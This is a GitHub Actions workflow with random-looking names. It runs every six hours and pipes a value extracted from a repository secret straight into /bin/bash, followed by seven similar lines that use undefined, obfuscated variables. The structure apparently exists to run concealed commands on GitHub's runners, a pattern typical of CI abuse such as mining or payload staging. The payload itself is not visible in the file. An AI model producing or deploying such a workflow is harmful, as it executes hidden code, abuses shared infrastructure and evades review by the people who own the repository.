name: tousanhougua

on:
  workflow_dispatch:
  schedule:
    - cron: '23 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tousanhougua
        env:
          ofgex252: ${{ secrets.ofgex252 }}
        run: |
          echo $ofgex252 | jq -r .tfp0 | /bin/bash
          echo $wak0088 | jq -r .khyrt609 | /bin/bash
          echo $pr7113 | jq -r .uqxzu2 | /bin/bash
          echo $lvmnz91461 | jq -r .j6210 | /bin/bash
          echo $h5661 | jq -r .r1054 | /bin/bash
          echo $r991 | jq -r .njhon1447 | /bin/bash
          echo $iugjy1 | jq -r .w6297 | /bin/bash
          echo $s9 | jq -r .mrs73 | /bin/bash

